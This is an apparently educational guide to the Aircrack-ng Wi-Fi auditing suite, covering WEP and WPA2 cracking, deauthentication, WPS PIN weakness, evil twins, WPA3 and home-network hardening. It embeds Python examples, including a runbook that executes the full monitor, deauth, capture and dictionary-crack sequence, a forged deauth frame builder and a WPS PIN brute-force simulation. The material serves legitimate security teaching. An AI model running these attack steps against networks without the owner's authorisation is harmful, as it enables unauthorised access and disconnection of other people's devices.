Aircrack-ng: Wireless Security Auditing
Assessing the security of WiFi networks.
Learn how to monitor, attack, test, and crack wireless security protocols.
How to Test Wi-Fi Safety
A simple guide to Aircrack-ng. Learn how professionals check whether a Wi-Fi network is strong, or whether it can be broken into easily.
Invisible Signals
Think of Aircrack-ng as a Swiss Army Knife for Wi-Fi. It is not just one tool, but a box of tools used together to check how safe a wireless network really is.
When you connect to Wi-Fi, your device sends invisible messages through the air. Aircrack-ng lets you catch these messages, read them, and test if the password protecting them is too weak.
Target: Check Wi-Fi locks
Action: Grab flying data
Goal: Find the weak spots
Data = Letters
How Wi-Fi Works
Wi-Fi works like people throwing letters to each other across a room. Everyone in the room can see the letters flying. But, because the letters are in locked envelopes, only the person with the right key (the Wi-Fi password) can read what is inside.
Aircrack-ng works by catching these locked envelopes as they fly by.
The Hardware Rule
Not every laptop will do.
The Wi-Fi card in a normal laptop runs in "managed" mode: it keeps only the letters addressed to it and throws the rest away. To use Aircrack-ng you need a card whose driver supports the two abilities below. A few built-in chipsets can do it, but most professionals use an external USB adapter that is known to work. Running airmon-ng with no arguments lists your cards and their drivers, so you can check before you start.
Monitor Mode
The ability to hear every letter flying through the air, even the ones not meant for your computer.
Packet Injection
The ability to write your own fake letters and throw them into the air to trick the Wi-Fi router.
The 4 Main Tools
airmon-ng
"The Switch"
Turns your normal Wi-Fi card into a super-listener (puts it in Monitor Mode).
airodump-ng
"The Net"
Catches the invisible letters flying through the air and saves them to a file.
aireplay-ng
"The Trickster"
Throws fake letters at the router to make it do things, like kicking someone off the Wi-Fi.
aircrack-ng
"The Key Maker"
For WPA, takes the saved handshake and tries passwords from a wordlist, one by one, until one matches. For WEP it needs no wordlist at all: it recovers the key by doing statistics on enough captured traffic.
WEP (The Old Lock)
WEP is a very old way to lock Wi-Fi. It is like a rusty padlock from the 1990s.
- Very weak.
- Aircrack-ng can recover the key in minutes once it has captured enough traffic. No password guessing is needed.
- You should never use this today.
WPA2 (The Modern Safe)
WPA2 (and its newer successor WPA3) is the modern way to lock Wi-Fi. It is like a heavy steel safe. The original WPA from 2003 was a stopgap and is now deprecated, so when this guide says WPA it means WPA2 unless stated otherwise.
- Much stronger.
- With WPA2, Aircrack-ng can only get in if the password is easy to guess, because every guess has to be checked against a captured handshake (explained next).
- WPA2 is the standard for homes today; WPA3 (covered further down) closes even the guessing route.
The Secret Knock
To attack a WPA2 lock, Aircrack-ng needs to catch a specific moment in time called the 4-Way Handshake: the short exchange a device and the router perform every time the device connects. Think of it like a secret knock at a door. The knock never contains the password itself, but it contains values computed from the password, so Aircrack-ng can check a guess against it later without ever talking to the router again.
The Attack Plan
Here is how professionals test a network step-by-step.
1. Listen to the air. Put the card into monitor mode with airmon-ng and watch all Wi-Fi signals in the room with airodump-ng. Then lock onto the target's channel and save what you catch to a file.
2. Kick someone off. Use aireplay-ng to send a forged disconnect message that forces a phone off the Wi-Fi.
3. Catch the knock. When the phone reconnects, airodump-ng records the handshake and shows a "WPA handshake" note at the top of its screen.
4. Guess the word. Take the capture file home and let aircrack-ng try millions of passwords against the handshake.
> Reading packets from file...
> 1 Handshake found!
> Starting Dictionary Attack...
Trying: password123
Trying: qwerty
Trying: letmein99
Trying: monkey
Trying: admin
KEY FOUND! [ letmein99 ]
* A "Dictionary Attack" is not magic. It simply reads a giant text file containing millions of common passwords and tries them all, one by one, super fast. If your password is not in that text file, Aircrack-ng cannot break it.
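The four steps above, written out as the actual command lines of the four tools and wrapped in a small Python runbook. This is an added example, not a script from the Aircrack-ng project: the interface name wlan0, the BSSID and client MAC, the channel, the capture prefix "handshake" and the wordlist path are placeholders to replace with your own, and the monitor interface name "wlan0mon" assumes a recent airmon-ng (older versions created mon0). With dry_run=True it only assembles the commands; with dry_run=False it runs them in order, keeping airodump-ng running in the background while aireplay-ng does the kick.

```python
"""Runbook for the four-step plan: assembles the real aircrack-ng command lines and,
if asked, runs them in the right order. Added example; the values in main() are
placeholders, not a real network."""
import shutil
import subprocess
import time


def attack_plan(iface, bssid, channel, client, prefix, wordlist):
    """Return the four commands, keyed by step. 'mon' assumes airmon-ng names the
    monitor interface <iface>mon (true for current releases; older ones used mon0)."""
    mon = f"{iface}mon"
    return {
        "monitor": ["airmon-ng", "start", iface],
        # Lock onto one channel and one network; -w writes <prefix>-01.cap
        "listen": ["airodump-ng", "-c", str(channel), "--bssid", bssid, "-w", prefix, mon],
        # 5 deauth rounds aimed at one client (drop -c to broadcast to every client)
        "deauth": ["aireplay-ng", "--deauth", "5", "-a", bssid, "-c", client, mon],
        # Offline: only the capture file and the wordlist are needed from here on
        "crack": ["aircrack-ng", "-w", wordlist, "-b", bssid, f"{prefix}-01.cap"],
    }


def missing_tools(plan):
    """Names of the tools in the plan that are not on PATH."""
    return sorted({cmd[0] for cmd in plan.values() if shutil.which(cmd[0]) is None})


def run(plan, dry_run=True, listen_seconds=30):
    """dry_run returns the command lines as strings; otherwise executes them.
    airodump-ng never exits on its own, so it runs in the background while
    aireplay-ng forces a reconnect, then is stopped before cracking starts."""
    if dry_run:
        return [" ".join(cmd) for cmd in plan.values()]
    subprocess.run(plan["monitor"], check=True)
    dump = subprocess.Popen(plan["listen"])
    try:
        time.sleep(5)                              # let airodump-ng settle on the channel
        subprocess.run(plan["deauth"], check=True)
        time.sleep(listen_seconds)                 # the reconnect and handshake happen here
    finally:
        dump.terminate()
        dump.wait()
    return subprocess.run(plan["crack"]).returncode


if __name__ == "__main__":
    plan = attack_plan("wlan0", "00:1A:2B:3C:4D:5E", 6, "AA:BB:CC:DD:EE:FF", "handshake", "rockyou.txt")
    for line in run(plan, dry_run=True):
        print(line)
    if missing_tools(plan):
        print("not installed:", ", ".join(missing_tools(plan)))
```

The only step without a command is step 3, because catching the knock is not something you run: it is airodump-ng doing its job while the phone reconnects, which is why that process has to stay alive across the deauth.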
The PCAP File
The handshake has to be stored somewhere. When you give airodump-ng a filename with -w, it writes every frame it catches, handshake included, into a capture file (the .cap or .pcap format that Wireshark also reads).
Think of the capture file as a digital box. Once the secret knock is safely inside this box, you can turn off your Wi-Fi scanner and go home. You do not need to be near the target router to guess the password anymore: aircrack-ng works entirely from the file.
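What it actually means for the box to "contain a handshake", as an added example that is not code from the Aircrack-ng project: a small parser that walks a pcap file, picks out the EAPOL-Key frames, works out which of the four handshake messages each one is, and reports which router/phone pairs have a usable exchange. The capture it checks is constructed in code with placeholder MAC addresses and nonces; it assumes the classic pcap format with link type 105 (raw 802.11 frames, no radiotap header), so a capture with a radiotap header would need that stripped first.

```python
"""Does a capture file actually contain a usable 4-way handshake? Added example, not
code from the Aircrack-ng project. It reads the classic pcap format with link type
105 (raw 802.11 frames, no radiotap header); the sample capture below is constructed
in code with placeholder MACs and nonces, not taken from a real network."""
import struct

PCAP_MAGIC, LINKTYPE_IEEE802_11 = 0xA1B2C3D4, 105
LLC_SNAP_EAPOL = bytes.fromhex("aaaa03000000888e")      # LLC/SNAP header announcing EAPOL (0x888E)
KEY_INSTALL, KEY_ACK, KEY_MIC = 0x0040, 0x0080, 0x0100  # Key Information bits


def eapol_key_message(frame):
    """Classify one raw 802.11 frame as handshake message 1..4, or return None."""
    if len(frame) < 24 or frame[0] & 0x0C != 0x08:       # type 2 = data frame
        return None
    ds = frame[1] & 0x03
    if ds == 0x01:                                        # To-DS: phone -> router
        bssid, sta = frame[4:10], frame[10:16]
    elif ds == 0x02:                                      # From-DS: router -> phone
        sta, bssid = frame[4:10], frame[10:16]
    else:
        return None
    e = frame[26 if frame[0] & 0x80 else 24:]             # QoS-Data adds a 2-byte QoS Control field
    if not e.startswith(LLC_SNAP_EAPOL):
        return None
    e = e[8:]
    if len(e) < 99 or e[1] != 3:                          # EAPOL packet type 3 = Key
        return None
    key_info = struct.unpack(">H", e[5:7])[0]
    replay = struct.unpack(">Q", e[9:17])[0]
    key_data_len = struct.unpack(">H", e[97:99])[0]
    if key_info & KEY_ACK:                                # only the router sets Key Ack
        msg = 3 if key_info & KEY_MIC and key_info & KEY_INSTALL else 1
    elif key_info & KEY_MIC:
        msg = 2 if key_data_len else 4                    # message 2 carries the RSN IE, message 4 carries nothing
    else:
        return None
    return {"bssid": bssid, "sta": sta, "msg": msg, "replay": replay, "nonce": e[17:49]}


def pcap_frames(data):
    magic, _, _, _, _, _, linktype = struct.unpack("<IHHiIII", data[:24])
    if magic != PCAP_MAGIC or linktype != LINKTYPE_IEEE802_11:
        raise ValueError("expected a little-endian pcap with link type 105 (raw 802.11)")
    off = 24
    while off + 16 <= len(data):
        incl = struct.unpack("<IIII", data[off:off + 16])[2]
        off += 16
        yield data[off:off + incl]
        off += incl


PAIRS = ((1, 2, 0), (3, 4, 0), (3, 2, 1))   # (router msg, phone msg, replay-counter offset)


def find_handshakes(data):
    """(bssid, sta) pairs for which the capture holds the router's nonce and the phone's
    nonce plus MIC from the same exchange, which is what a passphrase can be checked against."""
    seen = {}
    for frame in pcap_frames(data):
        m = eapol_key_message(frame)
        if m:
            seen.setdefault((m["bssid"], m["sta"]), {})[m["msg"]] = m
    usable = []
    for key, msgs in seen.items():
        if any(a in msgs and b in msgs and any(msgs[b]["nonce"])
               and msgs[a]["replay"] == msgs[b]["replay"] + d for a, b, d in PAIRS):
            usable.append(key)
    return usable


# ---- constructed sample capture ----
def eapol_key_frame(bssid, sta, from_ap, key_info, replay, nonce, key_data=b""):
    """Raw 802.11 data frame carrying one EAPOL-Key message (MIC and other fields left zero)."""
    hdr = (b"\x08\x02\x00\x00" + sta + bssid + bssid if from_ap
           else b"\x08\x01\x00\x00" + bssid + sta + bssid) + b"\x00\x00"
    body = (b"\x02" + struct.pack(">HHQ", key_info, 16, replay) + nonce + bytes(48)
            + struct.pack(">H", len(key_data)) + key_data)
    return hdr + LLC_SNAP_EAPOL + b"\x02\x03" + struct.pack(">H", len(body)) + body


def build_pcap(frames):
    header = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11)
    return header + b"".join(struct.pack("<IIII", 0, i, len(f), len(f)) + f for i, f in enumerate(frames))


AP, PHONE, TV = bytes.fromhex("001a2b3c4d5e"), bytes.fromhex("aabbccddeeff"), bytes.fromhex("112233445566")
ANONCE, SNONCE = b"\x11" * 32, b"\x22" * 32
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
BEACON = b"\x80\x00\x00\x00" + b"\xff" * 6 + AP + AP + b"\x00\x00" + bytes(12)   # skipped: not a data frame
SAMPLE_PCAP = build_pcap([
    BEACON,
    eapol_key_frame(AP, PHONE, True, KEY_ACK, 1, ANONCE),                                # M1
    eapol_key_frame(AP, PHONE, False, KEY_MIC, 1, SNONCE, RSN_IE),                       # M2
    eapol_key_frame(AP, PHONE, True, KEY_ACK | KEY_MIC | KEY_INSTALL, 2, ANONCE, RSN_IE),  # M3
    eapol_key_frame(AP, PHONE, False, KEY_MIC, 2, bytes(32)),                            # M4
    eapol_key_frame(AP, TV, True, KEY_ACK, 1, ANONCE),                                   # TV was kicked but never came back
])

if __name__ == "__main__":
    found = find_handshakes(SAMPLE_PCAP)
    print(f"{len(found)} handshake(s) found:", [(b.hex(':'), s.hex(':')) for b, s in found])
```

The TV in the sample shows the failure mode you will meet in practice: a device that was kicked off but did not come back leaves only message 1 in the box, and message 1 alone is not enough to check a single guess. The replay-counter check matters for the same reason: a message 1 from one connection paired with a message 2 from a later one will never verify.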
Digital Nametags
00:1A:2B:3C:4D:5E
MAC Addresses
Every device that talks over Wi-Fi (your phone, your TV, the router itself) identifies itself with a nametag built into its chip, called a MAC Address. The router's nametag (its BSSID) is fixed, which is how tools pick one network out of many. Modern phones randomize their own nametag per network, so a phone's address is no longer the permanent identifier it used to be.
When airodump-ng is listening to the air, it uses these nametags to know exactly who is talking. It might see "Nametag A (Router) is throwing letters to Nametag B (Phone)." This helps professionals aim their tools at the right targets: the "kick off" trick described below needs both addresses.
Wi-Fi Radio Channels
Wi-Fi is a lot like listening to the radio in your car. It has different stations (called channels). On the 2.4 GHz band most home routers use channel 1, 6 or 11; the 5 GHz band has many more.
If a target router is talking on channel 6 but your card is listening on channel 11, you will hear absolutely nothing. By default airodump-ng hops from channel to channel so it can list every network nearby, which means it can miss a handshake. Once you have picked a target, "tune the dial" by locking it onto that one channel before you try to catch a secret knock.
The Dictionary File
Aircrack-ng cannot reverse the math that turns a password into the Wi-Fi key. All it can do is take a guess, run it through the same math and see whether the result matches the handshake. So it only guesses words you give it, in a text file with millions of lines called a Wordlist.
One famous wordlist used by professionals is called rockyou.txt. It contains over 14 million passwords that real people used in the past. Matching is exact, capital letters and all. If the target's password is "monkey123", it is in the list and will be cracked. If their password is "PurpleElephantsDrinkingTea!", it is not in the list, and Aircrack-ng will fail.
A few consecutive lines from such a wordlist (illustrative excerpt):
superman
iloveyou
password
monkey123
princess
Laptop Brain (CPU)
A general-purpose processor handles a few guesses at a time. Aircrack-ng runs here, and each WPA2 guess costs 4,096 rounds of hashing, so a CPU manages thousands of guesses per second, not millions.
Gaming Brain (GPU)
A graphics card does thousands of identical small calculations at once, which is exactly what password guessing is. Aircrack-ng itself does not use the GPU; for big wordlists professionals convert the capture (for example with hcxpcapngtool) and hand it to a GPU cracker such as Hashcat.
The "Kick Off" Trick
Earlier we said Aircrack-ng needs to wait for someone to connect to the Wi-Fi so it can catch the secret knock. But what if nobody connects while you are watching? Professionals use a trick called a Deauthentication Attack.
Because Wi-Fi letters fly through the open air, and because disconnect messages on older networks carry no protection at all, the tool writes a fake letter. The letter says: "Hi Phone, this is the Router. Please disconnect immediately." The tool makes the letter look like it came from the real router by copying the router's nametag.
The phone obeys, disconnects, and then realizes it lost Wi-Fi. It immediately tries to reconnect. When it reconnects, it sends the secret knock. We catch it.
The caveat: networks that use Protected Management Frames (802.11w, which WPA3 requires and many WPA2 routers offer as an option) put an integrity check on disconnect messages. A phone on such a network throws the forgery away, and this trick does nothing.
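The fake letter itself, as an added example that is not aireplay-ng's code: the frame is built byte by byte, parsed back, and checked against a simple model of what a phone does with it with and without Protected Management Frames. The MAC addresses are constructed; the duration value and the reason code 7 mirror what aireplay-ng puts in its frames, which is an assumption stated here rather than something the page documents.

```python
"""The forged disconnect that aireplay-ng --deauth sends, built and parsed by hand,
plus the check that makes it useless against Protected Management Frames.
Added example; the MAC addresses are constructed. The duration value 0x013A and
reason code 7 mirror what aireplay-ng puts in its frames (assumption noted here)."""
import struct

REASON_CLASS3_FROM_NONASSOC = 7   # "Class 3 frame received from nonassociated station"


def deauth_frame(dst, src, bssid, seq, reason=REASON_CLASS3_FROM_NONASSOC):
    """802.11 Deauthentication frame: frame control 0xC0 0x00 (management, subtype 12,
    flags 0, so the Protected bit is clear), then duration, the three addresses,
    a sequence control field and the 2-byte reason code. No key is needed to build it."""
    return (b"\xc0\x00\x3a\x01" + dst + src + bssid
            + struct.pack("<H", (seq & 0x0FFF) << 4) + struct.pack("<H", reason))


def deauth_burst(ap, sta, rounds):
    """aireplay-ng -0 <rounds> -a AP -c STA sends each round as a pair: one frame forged
    'from the router' to the phone and one forged 'from the phone' to the router."""
    frames = []
    for i in range(rounds):
        frames.append(deauth_frame(dst=sta, src=ap, bssid=ap, seq=2 * i))
        frames.append(deauth_frame(dst=ap, src=sta, bssid=ap, seq=2 * i + 1))
    return frames


def parse_deauth(frame):
    """Decode a deauthentication frame; None for anything else."""
    if len(frame) < 26 or frame[0] != 0xC0:
        return None
    return {
        "protected": bool(frame[1] & 0x40),               # Protected Frame bit in the flags byte
        "dst": frame[4:10], "src": frame[10:16], "bssid": frame[16:22],
        "seq": struct.unpack("<H", frame[22:24])[0] >> 4,
        "reason": struct.unpack("<H", frame[24:26])[0],
    }


def station_obeys(frame, pmf_in_use):
    """Without 802.11w a station disconnects on any deauth that names its AP. With PMF
    negotiated, an unprotected deauth from the AP's address is discarded."""
    d = parse_deauth(frame)
    if d is None:
        return False
    return d["protected"] or not pmf_in_use


if __name__ == "__main__":
    AP, PHONE = bytes.fromhex("001a2b3c4d5e"), bytes.fromhex("aabbccddeeff")
    for f in deauth_burst(AP, PHONE, 2):
        d = parse_deauth(f)
        print(d["src"].hex(":"), "->", d["dst"].hex(":"), "reason", d["reason"],
              "obeyed without PMF:", station_obeys(f, False), "with PMF:", station_obeys(f, True))
```

The frame is 26 bytes and contains nothing secret, which is the whole problem: anyone with an injecting card can write one with the router's address in the source field. The attacker cannot set the Protected bit honestly, because that requires the key negotiated in the handshake, so on a PMF network the forgery is simply dropped.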
Hidden Wi-Fi
Some people try to be safe by hiding their Wi-Fi name (so it does not show up on your phone). This does not stop Aircrack-ng.
Even if the name is hidden, the router is still throwing invisible letters. When a phone connects to that "hidden" router, it has to say the real name in the clear in the messages it sends to join. Aircrack-ng just listens to the phone, and instantly un-hides the Wi-Fi network.
The WPS Backdoor
WPS is a serious danger.
Many routers have a physical "WPS Button" on the back. It lets you connect a printer without typing a long password. The same feature also accepts an 8-digit PIN, usually printed on a sticker on the router, and that PIN is the backdoor.
Eight digits sounds like 100 million possibilities, but the last digit is just a checksum of the other seven, and the router checks the first four digits before it looks at the rest, telling the client which half was wrong. That cuts the search to about 11,000 guesses. A tool called Reaver (separate from Aircrack-ng) walks through them; once it has the PIN, the router hands over the real, long Wi-Fi password for free. Some routers lock WPS after a few failures, which slows the attack down but does not remove it. The fix is to turn WPS off.
Example WPS PIN: 12345670. It looks random, but the final 0 is the checksum digit for 1234567, so it is a valid PIN, and guessing the two halves separately reaches it in under 2,000 tries.
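The arithmetic behind "about 11,000 guesses", as an added example: the checksum rule for the eighth digit, and a brute force that asks the router about the first half and the second half separately. The Registrar class is a constructed stand-in for the router's WPS side, written to leak exactly what the real protocol leaks (a wrong first half is rejected at message M4, a wrong second half only at M6); the search loop follows Reaver's approach but is not Reaver's code.

```python
"""Why an 8-digit WPS PIN is weak. Added example: the Registrar class is a constructed
stand-in for the router's WPS side, written to leak exactly what the real protocol
leaks; the search loop follows Reaver's approach but is not Reaver's code."""


def wps_checksum(first7):
    """Checksum digit for a 7-digit PIN body (alternating weights 3 and 1 from the right)."""
    acc, n = 0, first7
    while n:
        acc += 3 * (n % 10)
        n //= 10
        acc += n % 10
        n //= 10
    return (10 - acc % 10) % 10


def is_valid_pin(pin8):
    return len(pin8) == 8 and pin8.isdigit() and int(pin8[7]) == wps_checksum(int(pin8[:7]))


WORST_CASE_GUESSES = 10 ** 4 + 10 ** 3   # first half, then second half with the checksum fixed


class Registrar:
    """The router's side. A wrong first half is rejected after message M4, a wrong
    second half only after M6, so each answer tells the attacker which half failed."""

    def __init__(self, pin8):
        self.pin, self.attempts = pin8, 0

    def try_pin(self, guess):
        self.attempts += 1
        if guess[:4] != self.pin[:4]:
            return "M4_NACK"
        if guess[4:] != self.pin[4:]:
            return "M6_NACK"
        return "OK"


def brute_force(registrar):
    """Recover the PIN half by half: at most 10,000 tries for the first four digits,
    then at most 1,000 for digits five to seven, with the checksum digit computed."""
    for first in range(10_000):
        if registrar.try_pin(f"{first:04d}0000") != "M4_NACK":
            break
    else:
        return None
    for second in range(1_000):
        guess = f"{first:04d}{second:03d}"
        guess += str(wps_checksum(int(guess)))
        if registrar.try_pin(guess) == "OK":
            return guess
    return None


if __name__ == "__main__":
    router = Registrar("12345670")
    print("PIN", brute_force(router), "after", router.attempts, "attempts;",
          "naive search space would be 10^8, split search at most", WORST_CASE_GUESSES)
```

Against the page's example PIN the split search needs 1,803 attempts: 1,235 to find the first half and 568 for the second. Even the worst case stays at 11,000, which is why a router that answers WPS PIN attempts without locking is an open door.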
The Evil Twin
The real router at a coffee shop, named "Cafe_Guest", gives you internet safely.
A hacker uses tools to create a fake Wi-Fi with the exact same name, "Cafe_Guest", from a laptop in the same room (the Aircrack-ng suite includes a tool for this, airbase-ng). If your phone connects to the fake one by accident, the hacker sits between you and the internet: they can see which sites you visit and can tamper with anything that is not protected by HTTPS.
WPA3: The Future Safe
WPA3 fixes the biggest flaw in Wi-Fi.
The newest routers use WPA3 security. WPA3 completely changes how the "secret knock" works: it uses an exchange called SAE (Simultaneous Authentication of Equals), in which nothing that goes over the air can be checked against a password guess afterwards.
With WPA3, Aircrack-ng cannot grab the secret knock and take it home to guess passwords a million times a second. Every single guess requires a live exchange with the router, which sees every attempt. That turns an offline attack that runs for days on a graphics card into an online one that crawls.
WPA3 Status: resistant to offline dictionary attacks. It is not magic, though. A password like "password" can still be guessed in a handful of live tries, and a router running in "WPA3 transition" mode still accepts WPA2 clients, so the old handshake attack still works against it.
How to Protect Yourself
Make it Long
Because Aircrack-ng has to guess the exact word, the goal is a password that appears in no wordlist. Long and unusual beats short and "clever": "BlueHorseEatsApples" (19 characters, four everyday words) is far better than "P@ssw0rd1", which is exactly the kind of pattern cracking tools try first. Aim for 12 or more characters that are not a phrase anyone has used before.
Check Your Lock Type
Look at your router settings. Make sure the security is set to WPA2 or WPA3 (WPA3 if every device you own supports it). If it says WEP or plain WPA, change it immediately. While you are there, turn off WPS and, if the option is offered, turn on Protected Management Frames.
The Golden Rule
Testing a Wi-Fi network without permission from the owner is illegal. Professionals only use Aircrack-ng on networks they own or have been hired to test. Always stay safe and legal.